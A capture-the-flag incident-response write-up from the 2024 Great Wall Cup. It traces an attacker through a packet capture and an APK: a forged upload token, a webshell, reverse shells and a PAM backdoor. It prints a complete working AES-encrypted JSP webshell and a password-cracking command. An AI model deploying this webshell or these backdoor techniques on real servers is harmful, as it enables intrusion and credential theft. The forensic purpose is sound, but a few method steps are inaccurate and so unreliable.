2024 Great Wall Cup (长城杯) Final: Incident Response

Your colleague Li Bai, while operating a Linux server that hosts the back end of a mobile application, noticed something abnormal and suspects the server has been attacked. After a quick look, Xiao Li believes the cause is security problems in both the company's mobile app and its server-side program. Xiao Li exported the traffic from that day that may be related to the attack and packaged it together with the mobile app; you can download it for analysis.

1

Which two IPs did the attacker use against this server? (ordered by ASCII value, ascending, space-separated)

Tally the IPv4 addresses in the capture: 202.1.1.1, 202.1.1.66, 202.1.1.129, 202.1.1.130 and 202.1.1.254 appear.
202.1.1.66 is the victim server; 202.1.1.130 and 202.1.1.254 can clearly be ruled out as well.

202.1.1.1 202.1.1.129

2

What login password is used in the vulnerable APK?

Decompile the provided APK with jadx; the password password663399 is found in MainActivity.

password663399

3

What is the filename of the file the attacker tried to upload that was refused with "no upload permission"?

Search the capture for /api/upload; the first matching packet is shown below:

POST /api/upload HTTP/1.1
Access-Flag: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb290IjoiMCIsImV4cCI6MTcxNTQyMjY1OH0._NZIgZpwplDj9vxAyQgTpFVGP5Zragy0ysn5-N3CHRQ
Content-Type: multipart/form-data; boundary=73c2dff9-ef77-468c-a827-fbc47ae4273b
Content-Length: 216
Host: 202.1.1.66:8080
Connection: close
Accept-Encoding: gzip, deflate, br
User-Agent: okhttp/4.9.0

--73c2dff9-ef77-468c-a827-fbc47ae4273b
Content-Disposition: form-data; name="avatar"; filename="pic.jpg"
Content-Type: image/jpeg
Content-Length: 17

#!/bin/bash
df -h
--73c2dff9-ef77-468c-a827-fbc47ae4273b--
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: application/json
Transfer-Encoding: chunked
Date: Sat, 11 May 2024 10:12:45 GMT
Connection: close

24
{"msg":"...............","code":100}
0
pic.jpg

A regular-expression search of the capture for the string 无上传权限 ("no upload permission") should work as well.

4

What is the API address of the vulnerable endpoint the attacker exploited? (http://xxxx/xx)

Decompile the provided APK with jadx; http://202.1.1.66:8080/api/upload is found in HttpManager.

http://202.1.1.66:8080/api/upload

5

What is the absolute path of the webshell the attacker uploaded?

Search the capture for /api/upload; the following suspicious exchange is found:

POST /api/upload HTTP/1.1
Access-Flag: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE3MTUzNDA5NzEsIm5iZiI6MTcxNTM0MDY1MywiZXhwIjoxNzQ3Mzk1Mjk5LCJyb290IjoiMSJ9.JwIu15l_SfvL4DppXaWUBzDTi7-CMuWSMBasr_I3hYs
Content-Type: multipart/form-data; boundary=628c1882-2027-4c85-a009-e4cd41af99a9
Content-Length: 815
Host: 202.1.1.66:8080
Connection: close
Accept-Encoding: gzip, deflate, br
User-Agent: okhttp/4.9.0

--628c1882-2027-4c85-a009-e4cd41af99a9
Content-Disposition: form-data; name="avatar"; filename="pic.jsp"
Content-Type: image/jpeg
Content-Length: 17

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("bing_pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
--628c1882-2027-4c85-a009-e4cd41af99a9--
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: application/json
Transfer-Encoding: chunked
Date: Sat, 11 May 2024 10:13:18 GMT
Connection: close

92
{"msg":"..................http://202.1.1.66:8080/static/s74e7vwmzs21d5x6.jsp","code":0,"url":"http://202.1.1.66:8080/static/s74e7vwmzs21d5x6.jsp"}
0

The absolute path is found by checking the target host itself.

/usr/local/tomcat/webapps/ROOT/static/s74e7vwmzs21d5x6.jsp
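As an added example (not part of the original writeup), the following Python decodes the Access-Flag tokens of the two upload requests quoted above and relates their claims to the server's verdict on each upload. The tokens, response Date headers and JSON codes are copied from the capture excerpts; the one-day lifetime threshold is an assumed triage heuristic.

```python
import base64
import json
from email.utils import parsedate_to_datetime

# Access-Flag token, response Date header and JSON "code" of the two
# /api/upload exchanges quoted above (code 100 = refused, 0 = stored).
UPLOADS = [
    {"filename": "pic.jpg", "code": 100, "date": "Sat, 11 May 2024 10:12:45 GMT",
     "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb290IjoiMCIsImV4cCI6MTcxNTQyMjY1OH0."
              "_NZIgZpwplDj9vxAyQgTpFVGP5Zragy0ysn5-N3CHRQ"},
    {"filename": "pic.jsp", "code": 0, "date": "Sat, 11 May 2024 10:13:18 GMT",
     "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJpYXQiOjE3MTUzNDA5NzEsIm5iZiI6MTcxNTM0MDY1MywiZXhwIjoxNzQ3Mzk1Mjk5LCJyb290IjoiMSJ9."
              "JwIu15l_SfvL4DppXaWUBzDTi7-CMuWSMBasr_I3hYs"},
]
# Assumed triage threshold: an app session token valid for more than a day
# is out of line with the roughly five-minute token of the refused request.
MAX_LIFETIME_S = 86400

def b64url_decode(segment: str) -> bytes:
    """Decode one JWT segment, restoring the base64url padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def jwt_claims(token: str) -> dict:
    """Payload claims of a compact JWT; the signature is not checked (the HMAC
    key lives on the server, the point here is what the client presented)."""
    _header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(payload))

def triage_upload(upload: dict) -> dict:
    """Relate the token's privilege claim and remaining lifetime (measured from
    the response Date header) to the server's verdict on the upload."""
    claims = jwt_claims(upload["token"])
    seen_at = int(parsedate_to_datetime(upload["date"]).timestamp())
    remaining = claims["exp"] - seen_at
    return {
        "filename": upload["filename"],
        "accepted": upload["code"] == 0,
        "root": claims.get("root"),
        "remaining_s": remaining,
        "suspicious": claims.get("root") == "1" or remaining > MAX_LIFETIME_S,
    }

def triage_all(uploads=UPLOADS) -> list:
    """Triage every recorded upload; the accepted one carries root="1" and a
    token that stays valid for about a year."""
    return [triage_upload(u) for u in uploads]

if __name__ == "__main__":
    for finding in triage_all():
        print(finding)
```

The contrast between the two results (root claim and remaining lifetime) is the kind of signal a server-side log or WAF rule could alert on, independently of the upload's file extension.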

6

What is the password of the webshell the attacker uploaded?

Following on from the previous question, the password is bing_pass (the request parameter checked by the JSP).

bing_pass

7

What is the first command the attacker executed through the webshell?

Behinder (冰蝎) traffic can be analysed with puzzlersolver.

Search the capture for /static/s74e7vwmzs21d5x6.jsp; the first POST to it carries the first executed command as an AES-encrypted Behinder payload.


The AES key, returned by the earlier GET request (the bing_pass handshake), is b99f657b04941030.

Decrypting the body according to the logic of the uploaded webshell shows
that the first executed command is pwd.

pwd

8

When the attacker obtained the webshell, what did the query for the current shell's privileges return?

cat /etc/passwd on the target shows the tomcat user.

tomcat

Other approaches

For the response data in the capture, first display the raw bytes ("Show data as" raw in the stream view),
then decrypt them with AES using the session key.

9

What Linux distribution release does the server run, as queried through the webshell?

Run uname -a directly on the target.

CentOS Linux release 7.4.1708 (Core)

10

What is the absolute path of the secret file the attacker downloaded from the server?

Connect to the target; in the same directory as the webshell there is

/usr/local/tomcat/webapps/ROOT/static/secert.file

11

What is the first command the attacker executed through the reverse connection?

Filter the capture on port 4444 and follow the TCP stream:
tcp.port==4444

cat /etc/passwd

12

Through which file did the attacker change the root password? (absolute path)

Same as the previous question.

/etc/passwd

13

What root password did the attacker set?

Brute-force the root hash taken from /etc/passwd:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

123456

14

What are the IP and port of the reverse connection the attacker left as a backdoor? (ip:port)

Check the scheduled tasks (cron).

202.1.1.129:9999

15

What is the first command the attacker executed through the backdoor's reverse connection?

Filter the capture on port 9999 and follow the TCP stream:
tcp.port==9999

rpm -qa | grep pam

16

Through which file did the attacker leave the backdoor?

Following the command from the previous question, search for PAM-related files:
/usr/lib/security/pam_unix.so and /usr/lib64/security/pam_unix.so are found
and contain the backdoor.

pam_unix.so

17

What backdoor password did the attacker set?

ssh_back_pwd

18

In which file does the attacker's backdoor record the root password? (absolute path)

Reverse-engineering pam_unix.so shows that the backdoor records the root password in /tmp/.sshlog.

/tmp/.sshlog